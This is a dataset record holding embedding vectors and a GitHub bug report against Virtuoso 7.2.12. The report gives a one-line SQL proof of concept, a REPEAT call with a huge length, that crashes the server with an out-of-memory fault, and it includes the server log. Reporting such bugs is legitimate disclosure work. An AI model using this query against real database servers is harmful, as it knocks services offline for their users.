-0.004230433609336615, -0.022058943286538124, 0.011219999752938747, 0.006410924252122641, 0.009018339216709137, -0.0030025849118828773, -0.011262339539825916, -0.016427773982286453, 0.018742339685559273, -0.004279830027371645, 0.0018647074466571212, -0.007487056311219931, -0.02345615066587925, -0.00839735846966505, -0.010479056276381016, -0.015072905458509922, -0.0013336980482563376, -0.008905434049665928, 0.0016935848398134112, 0.016187848523259163, 0.026179999113082886, -0.01981494203209877, 0.03248860314488411, 0.0022933960426598787, -0.01901048980653286, -0.012066791765391827, -0.032460376620292664, 0.012087961658835411, -0.0009297075448557734, -0.0047279242426157, 0.0005543844308704138, 0.002243999857455492, -0.021734338253736496, 0.009900414384901524, 0.020407697185873985, -0.01109298039227724, 0.026702187955379486, 0.015947924926877022, -0.009681659750640392, -0.01296298112720251, 0.013231131248176098, 0.004660886712372303, 0.016512451693415642, 0.016752377152442932, 0.011219999752938747, 0.0054547544568777084, -0.03844437748193741, 0.0038176225498318672, 0.016159621998667717, -0.005239528138190508, -0.018290717154741287, 0.006721415091305971, -0.004964320454746485, 0.02500860206782818, 0.014480150304734707, -0.029355470091104507, 0.013668641448020935, 0.027083244174718857, -0.015115245245397091, -0.023427924141287804, 0.008115094155073166, 0.013569848611950874, 0.006252150516957045, 0.008079810999333858, -0.021169811487197876, -0.0016821178141981363, -0.009039509110152721, 0.006806094199419022, -0.02373841404914856, -0.007137754466384649, 0.027393734082579613, -0.011198829859495163, -0.00076431839261204, 0.0023674904368817806, -0.01028852816671133, -0.01645599864423275, -0.00507016945630312, -0.008961886167526245, -0.006686131935566664, 0.01806490495800972, 0.02426060289144516, 0.02283516898751259, -0.004018735606223345, 0.011833923868834972, 0.007289471570402384, 0.014832980930805206, -0.00882075447589159, 0.010041547007858753, -0.008058641105890274, 0.009448791854083538, -0.0024821602273732424, 0.002864981070160866, 0.0021804904099553823, -0.008778414689004421, -0.011325848288834095, 0.035875771194696426, -0.014931772835552692, -0.014889433048665524, 0.0042233774438500404, -0.015087018720805645, -0.008764301426708698, 0.018954036757349968, 0.0006650848663412035, -0.013012376613914967, -0.0152281504124403, 0.0016503632068634033, 0.0012322594411671162, -0.004117527976632118, 0.02866392396390438, -0.02814173512160778, -0.016625357791781425, 0.004283358342945576, 0.0026232923846691847, -0.017091093584895134, -0.009836905635893345, 0.00782577320933342, -0.012447848916053772, -0.026758641004562378, -0.004237490240484476, 0.010387320071458817, 0.0027026792522519827, -0.022397659718990326, -0.008757244795560837, -0.009321773424744606, -0.004678528290241957, -0.0311619620770216, -0.0076846410520374775, -0.007726980838924646, 0.02028067782521248, 0.016681810840964317, 0.03387169539928436, 0.0257283765822649, 0.01963147148489952, -0.008115094155073166, 0.0022422356996685266, -0.006262735463678837, 0.008065697737038136, 0.006862546782940626, 0.013936791568994522, -0.01156577281653881, -0.0017182829324156046, 0.0024962734896689653, 0.006357999984174967, 0.012327886186540127, 0.004794962238520384, -0.004742037504911423, 0.011290566064417362, -0.012659546919167042, -0.012687773443758488, 0.0013089999556541443, -0.001261367928236723, -0.0007030141423456371, 0.005648811347782612, -0.024768678471446037, 0.012617207132279873, 0.003930528182536364, -0.0002110365458065644, -0.006555584724992514, 0.029807092621922493, 0.0017121083801612258, 0.021790791302919388, -0.013739206828176975, -0.01080366037786007, 0.01599026285111904, 0.01512935757637024, -0.02397833950817585, 0.013880339451134205, 0.0031701792031526566, -0.017514489591121674, -0.014395471662282944, -0.017458036541938782, -0.007479999680072069, -0.00047852593706920743, -0.023907773196697235, -0.00860905647277832, 0.0005376249901019037, 0.008404415100812912, -0.0015242263907566667, 0.010881282389163971, -0.01631486788392067, 0.0037682263646274805, -0.0003711332392413169, -0.0008732546702958643, -0.00913124531507492, -0.007487056311219931, -0.033504754304885864, -0.014720074832439423, 0.013181735761463642, -0.0018329527229070663, -0.010069773532450199, -0.0011793348239734769, -0.005652339663356543, -0.01127645280212164, 0.010845999233424664, 0.004671471659094095, -0.007818716578185558, 0.009251207113265991, 0.001933509367518127, 0.000512485858052969, -0.010824830271303654, -0.014176716096699238, 0.007769320625811815, 0.022538792341947556, -0.0010258537949994206, 0.002235179068520665, -0.015482188202440739, -0.011897433549165726, -0.022722262889146805, -0.017175773158669472, -0.018742339685559273, -0.005154849030077457, -0.0019370376830920577, -0.0005318914772942662, 0.025615470483899117, -0.0000755828368710354, 0.0020799338817596436, -0.000017944721548701636, 0.01203856524080038, 0.003852905472740531, 0.00438567902892828, 0.02067584916949272, -0.0036800187081098557, -0.006343886721879244, -0.016441885381937027, 0.002383367856964469, 0.014395471662282944, -0.009349999949336052, 0.01919396221637726, -0.00559235829859972, 0.011989169754087925, 0.004572679288685322, 0.00986513216048479, -0.014748301357030869, 0.02586950920522213, 0.0053630187176167965, 0.015722112730145454, -0.016808830201625824, -0.0022563489619642496, 0.008834867738187313, 0.0072259618900716305, -0.008044527843594551, -0.0037435281556099653, 0.04019441455602646, -0.018290717154741287, -0.0008401768864132464, -0.005475924350321293, -0.011262339539825916, -0.018149584531784058, -0.009300603531301022, -0.0005557075492106378, 0.0030043490696698427, 0.009681659750640392, -0.00040288796299137175, 0.001748273498378694, 0.018177811056375504, 0.020040754228830338, 0.029355470091104507, -0.01239139586687088, -0.017853207886219025, 0.007896339520812035, 0.0029002639930695295, 0.00022040860494598746, -0.0038952452596277, -0.008411471731960773, 0.015044678933918476, 0.011156490072607994, 0.015072905458509922, -0.0010999480728060007, 0.012581923976540565, -0.025093281641602516, 0.01491765957325697, -0.0006518537411466241, -0.00011136202374473214, 0.03135954588651657, 0.014310792088508606, 0.010965961962938309, -0.005080754403024912, 0.008235055953264236, -0.0027238489128649235, -0.018417734652757645, -0.0025103867519646883, 0.043299321085214615, 0.018996376544237137, 0.02619411237537861, 0.021677885204553604, -0.011946829967200756, 0.014049697667360306, 0.01597614958882332, 0.01693584769964218, -0.012370225973427296, 0.013358150608837605, 0.03031516820192337, -0.007846943102777004, 0.03243215009570122, 0.007536452729254961, 0.014141433872282505, -0.008446754887700081, 0.017570942640304565, -0.0029108489397913218, 0.006061622407287359, -0.004315113183110952, -0.02284928224980831, 0.026603395119309425, 0.004854943137615919, 0.005235999822616577, -0.002704443410038948, -0.018516527488827705, 0.0075929053127765656, -0.0022545848041772842, 0.010429659858345985, 0.020915772765874863, -0.010217961855232716, -0.0019017546437680721, -0.020393583923578262, 0.027746565639972687, 0.006806094199419022, -0.006781395990401506, 0.019843168556690216, -0.01599026285111904, 0.015566867776215076, -0.015482188202440739, 0.016060829162597656, 0.010641357861459255, 0.025234414264559746, -0.014734188094735146, -0.00199878285638988, 0.02067584916949272, 0.011078867129981518, -0.008806641213595867, 0.0013795660343021154, -0.020111320540308952, -0.018149584531784058, 0.0005839339573867619, 0.002810292411595583, 0.000762995274271816, -0.011791584081947803, -0.0264340378344059, -0.02132505550980568, -0.024373508989810944, -0.005832282826304436, 0.011601055972278118, 0.00808686763048172, -0.03127486631274223, -0.013802716508507729, 0.00013892688730265945, 0.01607494242489338, -0.013873282819986343, -0.005998113192617893, -0.001099065993912518, 0.005147792398929596, -0.023710187524557114, -0.018558867275714874, -0.0035688772331923246, 0.020873432978987694, 0.0178673192858696, -0.017754415050148964, 0.010944792069494724, -0.0007396202418021858, -0.01655479148030281, -0.004886697977781296, -0.0008282688213512301, 0.012172641232609749, 0.005976943299174309, 0.014240225777029991, -0.010083886794745922, -0.01066252775490284, -0.0019070471171289682, -0.009582867845892906, -0.004685584921389818, -0.01645599864423275, 0.005041943397372961, 0.004939622711390257, -0.016851169988512993, 0.024599319323897362, -0.010196791961789131, 0.015312829986214638, 0.025996526703238487, -0.009215923957526684, 0.009152415208518505, 0.0091947540640831, -0.024105357006192207, 0.004611490294337273, -0.009039509110152721, -0.009632264263927937, -0.002448641462251544, -0.005680565722286701, -0.01181981060653925, -0.001141405664384365, 0.01328758429735899, 0.0037541131023317575, 0.023230338469147682, -0.025601357221603394, -0.0030943206511437893, -0.023484377190470695, 0.005317150615155697, -0.005059584975242615, -0.019179848954081535, 0.024429962038993835, -0.005490037612617016, 0.008707848377525806, -0.0020640564616769552, 0.011530490592122078, -0.03212165832519531, -0.017373358830809593, 0.011114150285720825, -0.0021487358026206493, 0.006629678886383772, 0.0065026599913835526, -0.009321773424744606, -0.026984451338648796, 0.011417584493756294, 0.012871244922280312, 0.00258448114618659, 0.03031516820192337, -0.0015471603255718946, -0.029637735337018967, -0.005800527986139059, 0.03155713155865669, 0.003293669782578945, 0.010133282281458378, 0.009688716381788254, -0.0016353678656741977, -0.0055076791904866695, 0.004371565766632557, 0.0047173392958939075, -0.027069130912423134, 0.004939622711390257, -0.029524829238653183, 0.005306565668433905, 0.024768678471446037, -0.0014986462192609906, 0.02615177258849144, 0.0056135281920433044, 0.003715301863849163, -0.0094558484852314, -0.02526264078915119, 0.005581773351877928, 0.0062944903038442135, -0.026927998289465904, 0.001836481038480997, -0.021056905388832092, -0.0011661037569865584, 0.021014565601944923, -0.018191924318671227, 0.04767441377043724, -0.00662262225523591, 0.0076987543143332005, 0.024034792557358742, -0.005648811347782612, -0.003470084862783551, 0.009759282693266869, 0.006488547194749117, 0.010274414904415607, 0.004854943137615919, 0.003891716944053769, -0.023653734475374222, 0.006636735517531633, 0.004805547185242176, -0.0055076791904866695, 0.016512451693415642, -0.013887396082282066, -0.005941660143435001, -0.0043645091354846954, -0.020689962431788445, 0.0023304433561861515, -0.003189584705978632, 0.021494414657354355, 0.013965018093585968, 0.016780603677034378, 0.0030308112036436796, 0.020252451300621033, -0.012892414815723896, 0.02444407530128956, -0.06712241470813751, 0.017726188525557518, 0.017712075263261795, -0.011840980499982834, -0.014691848307847977, 0.023766640573740005, 0.006721415091305971, -0.0026356414891779423, 0.020083094015717506, 0.01302648987621069, -0.012024452909827232, -0.0076070185750722885, 0.012581923976540565, -0.010486112907528877, -0.011551659554243088, 0.005334792193025351, 0.012567810714244843, 0.009166528470814228, -0.007917509414255619, 0.021720224991440773, 0.027845358476042747, 0.004971377085894346, 0.0098863011226058, -0.003616509260609746, 0.008319735527038574, -0.003948169760406017, 0.026307018473744392, 0.023103319108486176, -0.00046794101945124567, -0.024415848776698112, 0.005214829929172993, 0.010006263852119446, -0.023865433409810066, 0.0024609905667603016, 0.011812753975391388, -0.015058792196214199, 0.0015427499311044812, 0.01730279251933098, 0.018699999898672104, 0.0005261580226942897, 0.0304563008248806, 0.011297622695565224, 0.0020005470141768456, -0.0019423301564529538, -0.017373358830809593, -0.0027785375714302063, -0.00860905647277832, -0.009978037327528, 0.01007683016359806, -0.028452225029468536, -0.002035830169916153, -0.007180094253271818, 0.00189116969704628, 0.00516543397679925, -0.004473886452615261, -0.01607494242489338, 0.006051037460565567, -0.014621282927691936, 0.005391245242208242, -0.027182037010788918, 0.0060580940917134285, 0.01260309386998415, -0.010782490484416485, -0.019165735691785812, -0.0147059615701437, -0.004473886452615261, -0.018982263281941414, -0.012998263351619244, -0.0007431485573761165, 0.009004225954413414, 0.009110075421631336, 0.007028377149254084, -0.010210905224084854, -0.0030590377282351255, -0.028198188170790672, 0.00044941744999960065, -0.00417398102581501, -0.0075293960981070995, -0.0003817181568592787, -0.0023198584094643593, 0.02351260371506214, 0.012200867757201195, 0.0026550469920039177, -0.004678528290241957, 0.012236150912940502, -0.0004604433779604733, -0.002995528280735016, -0.04208558425307274, 0.0006103962077759206, 0.0252061877399683, -0.009787509217858315, -0.01693584769964218, 0.008227999322116375, -0.007155396044254303, 0.005306565668433905, 0.0019176320638507605, -0.010782490484416485, 0.026829207316040993, 0.021931923925876617, 0.018699999898672104, -0.014296678826212883, 0.012017396278679371, -0.011925660073757172, 0.002963773440569639, 0.008623169735074043, 0.0031842924654483795, 0.001503056613728404, -0.011699848808348179, 0.03460558503866196, -0.01635720767080784, 0.012243207544088364, -0.004378622397780418, 0.051089808344841, -0.012356112711131573, -0.008044527843594551, 0.012123244814574718, 0.007896339520812035, -0.011269396170973778, -0.013104112818837166, 0.011241169646382332, -0.016399547457695007, 0.00887015089392662, 0.011241169646382332, 0.029863545671105385, 0.017796754837036133, -0.012207924388349056, 0.01532694324851036, -0.01826249063014984, 0.032460376620292664, -0.01153754722326994, -0.013181735761463642, 0.0037399998400360346, 0.005006660241633654, -0.01816369779407978, 0.008630226366221905, -0.013231131248176098, 0.0018003160366788507, -0.005045471712946892, 0.0026479905936867, 0.0024098302237689495, 0.007395320571959019, -0.0029179055709391832, -0.012673660181462765, 0.004166924394667149, -0.007042490411549807, 0.00456562265753746, -0.00938528310507536, 0.00803747121244669, -0.01750037632882595, 0.002332207513973117, 0.007677584886550903, 0.0010999480728060007, 0.007811659947037697, -0.015284603461623192, -0.01033792458474636, 0.04075894132256508, -0.025290867313742638, -0.008072754368185997, 0.009533471427857876, -0.02601063996553421, 0.009328830055892467, -0.012137358076870441, 0.00391288660466671, 0.020252451300621033, -0.0012816556263715029, -0.022948075085878372, 0.019702037796378136, -0.005814641248434782, 0.00027763325488194823, 0.008898377418518066, -0.004068132024258375, -0.005518264137208462, -0.021480301395058632, -0.010464943014085293, 0.020816979929804802 ]
null
null
null
null
null
null
null
null
null
[ "openlink", "virtuoso-opensource" ]
Virtuoso 7.2.12 crashes with the REPEAT function. docker image: `openlink/virtuoso-opensource-7:7.2.12` PoC: ```sql SELECT REPEAT(' ', 6000999999999999999); ``` Server log: ``` 11:55:35 Memory low! Using memory reserve to terminate current activities properly 11:55:35 Current location of the program break 69259264 11:55:35 Current location of the program break 69259264 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x6085e5) [0x5566f02085e5] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x608679) [0x5566f0208679] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x6110a6) [0x5566f02110a6] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x5f32f6) [0x5566f01f32f6] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x5f46b0) [0x5566f01f46b0] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x1c5636) [0x5566efdc5636] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x243e55) [0x5566efe43e55] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x270ea8) [0x5566efe70ea8] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x561dbb) [0x5566f0161dbb] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x1faa0e) [0x5566efdfaa0e] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x2898b7) [0x5566efe898b7] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x28e4fb) [0x5566efe8e4fb] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x28e66f) [0x5566efe8e66f] 11:55:35 Switching back from memory reserve to normal mode 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x28e788) [0x5566efe8e788] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x60d76e) [0x5566f020d76e] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x615106) [0x5566f0215106] 11:55:35 /lib/x86_64-linux-gnu/libpthread.so.0(+0x8609) [0x7f6c15b33609] 11:55:35 /lib/x86_64-linux-gnu/libc.so.6(clone+0x43) [0x7f6c15901353] 11:55:35 GPF: Dkernel.c:5899 Out of memory GPF: Dkernel.c:5899 Out of memory ``` It can also be reproduced on the latest commit when compiling with `CC=gcc CXX=g++ ./configure`. However, if compiling with `--with-debug` enabled, the crash disappears, and the output of the SQL becomes `[22023][OpenLink][Virtuoso ODBC Driver][Virtuoso Server]SR083: The expected result length is too large in call of repeat()`.
Virtuoso 7.2.12 crashes with the REPEAT function
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1282/comments
0
2024-04-29T12:41:02
2024-05-03T10:57:41Z
https://github.com/openlink/virtuoso-opensource/issues/1282
2,268,942,059
1,282
false
This is a GitHub Issue repo:virtuoso-opensource owner:openlink Title : Virtuoso 7.2.12 crashes with the REPEAT function Issue date: --- start body --- Virtuoso 7.2.12 crashes with the REPEAT function. docker image: `openlink/virtuoso-opensource-7:7.2.12` PoC: ```sql SELECT REPEAT(' ', 6000999999999999999); ``` Server log: ``` 11:55:35 Memory low! Using memory reserve to terminate current activities properly 11:55:35 Current location of the program break 69259264 11:55:35 Current location of the program break 69259264 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x6085e5) [0x5566f02085e5] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x608679) [0x5566f0208679] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x6110a6) [0x5566f02110a6] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x5f32f6) [0x5566f01f32f6] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x5f46b0) [0x5566f01f46b0] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x1c5636) [0x5566efdc5636] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x243e55) [0x5566efe43e55] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x270ea8) [0x5566efe70ea8] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x561dbb) [0x5566f0161dbb] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x1faa0e) [0x5566efdfaa0e] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x2898b7) [0x5566efe898b7] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x28e4fb) [0x5566efe8e4fb] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x28e66f) [0x5566efe8e66f] 11:55:35 Switching back from memory reserve to normal mode 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x28e788) [0x5566efe8e788] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x60d76e) [0x5566f020d76e] 11:55:35 /opt/virtuoso-opensource/bin/virtuoso-t(+0x615106) [0x5566f0215106] 11:55:35 /lib/x86_64-linux-gnu/libpthread.so.0(+0x8609) [0x7f6c15b33609] 11:55:35 /lib/x86_64-linux-gnu/libc.so.6(clone+0x43) [0x7f6c15901353] 11:55:35 GPF: Dkernel.c:5899 Out of memory GPF: Dkernel.c:5899 Out of memory ``` It can also be reproduced on the latest commit when compiling with `CC=gcc CXX=g++ ./configure`. However, if compiling with `--with-debug` enabled, the crash disappears, and the output of the SQL becomes `[22023][OpenLink][Virtuoso ODBC Driver][Virtuoso Server]SR083: The expected result length is too large in call of repeat()`. --- end body ---
2,434
[ -0.02326681651175022, -0.00433467049151659, -0.014760908670723438, -0.0007684103911742568, 0.05598299205303192, 0.006359002087265253, -0.013884317129850388, 0.04094722121953964, 0.003667940851300955, 0.02020617574453354, 0.012197992764413357, 0.0007855893345549703, 0.012651145458221436, -0.009642506018280983, 0.011157969012856483, 0.019938740879297256, -0.0365494042634964, -0.0025090572889894247, -0.0446021594107151, -0.0035082229878753424, -0.00907049234956503, 0.022984525188803673, -0.034350499510765076, 0.05342750623822212, 0.023385675624012947, 0.01389174535870552, -0.004616962280124426, -0.008089899085462093, -0.0021747639402747154, -0.0050775445997715, 0.02830350399017334, 0.03438021242618561, -0.013550023548305035, 0.012019703164696693, 0.029848681762814522, -0.0019574733451008797, 0.02854122221469879, 0.025792589411139488, 0.013111728243529797, 0.0063330018892884254, -0.0130671551451087, 0.0073247384279966354, 0.0032073589973151684, 0.04926741123199463, -0.01799241080880165, 0.04382957145571709, 0.010110516101121902, 0.011150539852678776, -0.051317743957042694, 0.02292509377002716, 0.004056092351675034, -0.029833823442459106, 0.0033373618498444557, -0.05167432129383087, -0.0486731119453907, -0.04543418064713478, 0.030279548838734627, 0.02958124689757824, 0.020221032202243805, 0.012792292051017284, -0.018022125586867332, -0.021350201219320297, 0.005831561516970396, 0.027189191430807114, 0.005322692915797234, 0.022984525188803673, -0.02313309907913208, -0.005281834863126278, -0.026802897453308105, 0.023816542699933052, -0.04180895537137985, -0.038391731679439545, 0.03952090069651604, 0.0415712334215641, 0.045107316225767136, -0.013884317129850388, 0.03149786219000816, 0.005645843222737312, -0.016833527013659477, 0.01377288531512022, -0.025733157992362976, 0.04932684078812599, -0.03610368072986603, 0.03206244483590126, 0.014731192961335182, 0.007161306217312813, -0.014263182878494263, -0.07214793562889099, -0.045761045068502426, -0.02837779000401497, -0.012732861563563347, 0.03146814554929733, 0.015986651182174683, 0.03544995188713074, -0.0032742174807935953, -0.0003842051955871284, -0.041006650775671005, 0.005051543936133385, -0.04798966646194458, 0.03268646076321602, -0.02874922752380371, -0.01177455484867096, 0.013624310493469238, 0.028036069124937057, 0.03244873881340027, 0.005389551632106304, -0.008075041696429253, -0.03509337082505226, 0.0062327138148248196, 0.11232256144285202, 0.025881733745336533, -0.01561521366238594, -0.03167615085840225, -0.02634231559932232, -0.01398089062422514, -0.035152800381183624, 0.022494228556752205, 0.011893413960933685, -0.03429106995463371, 0.00918935239315033, -0.026936614885926247, -0.03298360854387283, -0.0062438566237688065, -0.008208759129047394, -0.02744176983833313, 0.030086399987339973, -0.03140871599316597, -0.018111269921064377, -0.04299755394458771, -0.021053051576018333, -0.014887196943163872, -0.061866555362939835, -0.015065486542880535, -0.017427826300263405, 0.03782714903354645, -0.010474524460732937, -0.026773182675242424, 0.025049714371562004, -0.02112733945250511, 0.0072987377643585205, -0.08706484735012054, -0.044453587383031845, 0.03809458389878273, -0.006927301175892353, 0.014864910393953323, 0.004858396481722593, -0.03738142549991608, -0.003010497195646167, 0.005530697759240866, 0.01616493985056877, 0.0021970500238239765, -0.027263479307293892, 0.018348990008234978, 0.027590343728661537, -0.01254714373499155, -0.01981988176703453, 0.0013464592630043626, 0.015778645873069763, 0.0010279520647600293, -0.02140963077545166, -0.05749845504760742, -0.012888865545392036, -0.00613613985478878, -0.03678712621331215, -0.010571097955107689, 0.01647694781422615, 0.0010790246305987239, 0.04590962082147598, 0.0023734827991575003, -0.0012053132522851229, -0.022211935371160507, 0.013200872577726841, 0.020800475031137466, 0.03506365790963173, -0.011915700510144234, 0.007514171302318573, 0.0028359219431877136, 0.027070332318544388, -0.007269022986292839, -0.012807149440050125, -0.03235959634184837, 0.007852178998291492, -0.02606002241373062, -0.0019779023714363575, 0.043354131281375885, 0.0064295753836631775, 0.030606413260102272, -0.014894625172019005, 0.03057669848203659, -0.0038889457937330008, 0.0008649840019643307, 0.006581864319741726, 0.01916615106165409, -0.012911152094602585, -0.018319275230169296, -0.0047469655983150005, -0.028154928237199783, 0.0009973085252568126, -0.02295481041073799, -0.013550023548305035, 0.018764998763799667, -0.054318953305482864, -0.037529997527599335, -0.0018246844410896301, -0.019864453002810478, 0.026698894798755646, 0.005883562844246626, 0.05675558000802994, 0.024158265441656113, -0.022939952090382576, -0.005794418044388294, -0.014820338226854801, 0.008015611208975315, 0.018675854429602623, -0.05143660306930542, 0.01637294515967369, -0.03696541488170624, 0.004520388785749674, -0.02143934555351734, -0.00115516921505332, 0.017606116831302643, -0.006671009585261345, 0.0019091864814981818, -0.008832773193717003, -0.028110355138778687, -0.0062178559601306915, -0.003926089499145746, -0.03619282692670822, -0.04240325465798378, -0.01080881804227829, 0.04944569990038872, -0.018007267266511917, -0.0258965902030468, -0.001248957123607397, 0.05524011701345444, -0.002614916767925024, -0.02313309907913208, 0.0028340646531432867, -0.00579070346429944, 0.01311915647238493, 0.046385057270526886, 0.03717342019081116, -0.00936021376401186, -0.006923586595803499, 0.018230130895972252, 0.06044023483991623, -0.03161672130227089, 0.005512125790119171, -0.010021371766924858, -0.009018491953611374, -0.019285012036561966, -0.003094070591032505, -0.009419643320143223, 0.004431243985891342, 0.03830258920788765, 0.018973004072904587, 0.036252256482839584, 0.029700106009840965, -0.027976637706160545, -0.007421312388032675, 0.021008480340242386, 0.029804108664393425, -0.031973302364349365, 0.0076070306822657585, 0.03230016678571701, 0.020741045475006104, -0.050485722720623016, -0.007205878850072622, 0.002063332824036479, -0.0057758460752666, 0.03482593595981598, 0.0011384545359760523, -0.024054262787103653, -0.04454272985458374, -0.012740290723741055, -0.028110355138778687, -0.013802601024508476, -0.009865367785096169, 0.045255888253450394, -0.02574801631271839, 0.012331710197031498, -0.01013280265033245, -0.016046080738306046, 0.027248620986938477, 0.02712976187467575, -0.006362716667354107, 0.03595510497689247, -0.005174118094146252, 0.001297243870794773, -0.04644448682665825, -0.026416603475809097, -0.019433585926890373, -0.02368282526731491, 0.04626619815826416, -0.007098162081092596, 0.02527257613837719, 0.030041828751564026, 0.015912363305687904, 0.003270503133535385, 0.009330498985946178, -0.03271617367863655, -0.011395689100027084, 0.0020651898812502623, 0.008238473907113075, -0.05093144625425339, -0.030814416706562042, -0.006117568351328373, -0.022434797137975693, -0.018794715404510498, 0.004888111725449562, 0.014961483888328075, -0.03530137613415718, -0.020562754943966866, 0.00023748756211716682, 0.003848087741062045, -0.006147283129394054, 0.016491804271936417, -0.018126128241419792, -0.020354749634861946, -0.025629157200455666, -0.009523645974695683, -0.021498776972293854, -0.093364417552948, 0.01497634220868349, 0.07826921343803406, -0.01961187645792961, -0.04133351519703865, 0.02950695902109146, -0.051109738647937775, 0.017873549833893776, 0.012004845775663853, -0.03952090069651604, 0.0031014992855489254, 0.0133048752322793, 0.00423066783696413, -0.05449724197387695, -0.004408957902342081, -0.02585201896727085, 0.006414717994630337, -0.006273571867495775, -0.011172826401889324, 0.02830350399017334, -0.004382957238703966, -0.018259845674037933, 0.03033897839486599, 0.019403871148824692, 0.012405997142195702, -0.01665523648262024, 0.01144768949598074, 0.013520308770239353, 0.000980593846179545, 0.04498845711350441, -0.027055473998188972, 0.043799858540296555, 0.0380648672580719, -0.014493473805487156, -0.034350499510765076, -0.00578327476978302, 0.01950787380337715, 0.005415552295744419, 0.000984308193437755, -0.010177374817430973, -0.0026037737261503935, 0.01965644769370556, 0.01259914506226778, -0.016298657283186913, 0.02540629357099533, 0.0012703146785497665, 0.01882443018257618, -0.020057599991559982, -0.052179478108882904, 0.025762872770428658, 0.00010812300024554133, -0.007142734248191118, -0.027486341074109077, -0.013371733948588371, 0.053932659327983856, -0.012079132720828056, 0.01772497594356537, 0.015199203975498676, -0.005463839042931795, -0.01103168074041605, 0.021023336797952652, -0.0022267650347203016, 0.030086399987339973, 0.04177923873066902, -0.016566092148423195, 0.02616402506828308, -0.00663758022710681, -0.027664631605148315, -0.006035852245986462, 0.008587624877691269, -0.04995085299015045, -0.07244507968425751, -0.017294108867645264, 0.05815218389034271, -0.0031609293073415756, -0.002666918095201254, 0.026282886043190956, -0.029105806723237038, 0.004093236289918423, -0.03146814554929733, 0.023742256686091423, -0.004137808922678232, 0.0015405351296067238, 0.01958216167986393, 0.004427529405802488, -0.007551315240561962, 0.04374042525887489, 0.01647694781422615, 0.03782714903354645, -0.012457998469471931, -0.02224165014922619, -0.005356122273951769, 0.019181009382009506, 0.01168540958315134, 0.018601566553115845, -0.020562754943966866, -0.04299755394458771, 0.022464511916041374, -0.032151591032743454, 0.011403117328882217, 0.004405243322253227, 0.03482593595981598, 0.0007303380989469588, -0.005701558664441109, 0.0032407883554697037, -0.004940112587064505, 0.008528194390237331, -0.00018432563228998333, -0.01686324179172516, 0.00947907380759716, 0.007109304890036583, 0.015206633135676384, -0.008535623550415039, -0.024321697652339935, -0.025495439767837524, 0.02903151884675026, -0.008661911822855473, -0.022598229348659515, -0.008751057088375092, 0.03331047296524048, -0.03016068786382675, 0.0045612468384206295, 0.005980136338621378, 0.016358086839318275, -0.03438021242618561, -0.007956181652843952, -0.01730896718800068, 0.002315910067409277, 0.018764998763799667, 0.0031906443182379007, -0.0019649020396173, -0.012123704887926579, 0.013832315802574158, 0.00994708389043808, -0.008290475234389305, 0.015176917426288128, 0.04002605751156807, 0.009553360752761364, -0.022003930062055588, -0.008862487971782684, 0.018022125586867332, -0.015139774419367313, 0.016952386125922203, 0.026461174711585045, 0.011455118656158447, -0.032835036516189575, 0.00010823908087331802, -0.020770760253071785, -0.008959061466157436, -0.007064732722938061, -0.032805319875478745, 0.013148871250450611, -0.02848179265856743, 0.00036888342583552003, 0.039491187781095505, 0.0009889511857181787, -0.03253788501024246, 0.008535623550415039, -0.008112184703350067, 0.00538583705201745, -0.02023589052259922, 0.018883859738707542, 0.04899997636675835, 0.0068604424595832825, 0.009226496331393719, -0.05030743405222893, -0.020800475031137466, 0.011544263921678066, 0.024693135172128677, 0.005434123799204826, -0.05916249379515648, -0.011507119983434677, 0.0018348990706726909, -0.0032742174807935953, -0.0619259849190712, 0.019359298050403595, 0.037589430809020996, -0.03568767011165619, 0.022152505815029144, -0.0246188472956419, -0.003001211443915963, 0.021914785727858543, -0.014545475132763386, -0.026223456487059593, 0.011321401223540306, 0.04255182668566704, -0.014136893674731255, -0.03640083223581314, 0.006154711823910475, -0.022078217938542366, -0.001108739641495049, -0.018943289294838905, -0.019121579825878143, -0.0009638791671022773, 0.01955244690179825, -0.022761661559343338, 0.03212187439203262, -0.0033076468389481306, -0.014315184205770493, 0.0026632037479430437, -0.011625980027019978, 0.015734072774648666, -0.0024496272671967745, 0.01833413355052471, 0.040976934134960175, 0.008141900412738323, 0.008290475234389305, -0.02906123548746109, -0.01937415637075901, -0.0015126774087548256, 0.018987862393260002, 0.01485748216509819, -0.04216553270816803, 0.0012777434894815087, 0.017175249755382538, 0.005831561516970396, -0.012294566258788109, -0.0006453718524426222, 0.013349447399377823, 0.0640060305595398, -0.027263479307293892, 0.007276451680809259, 0.027813205495476723, 0.024054262787103653, -0.022642802447080612, 0.030844133347272873, 0.01539235096424818, -0.009932226501405239, 0.02344510704278946, -0.007711033336818218, 0.01613522507250309, -0.003647511824965477, 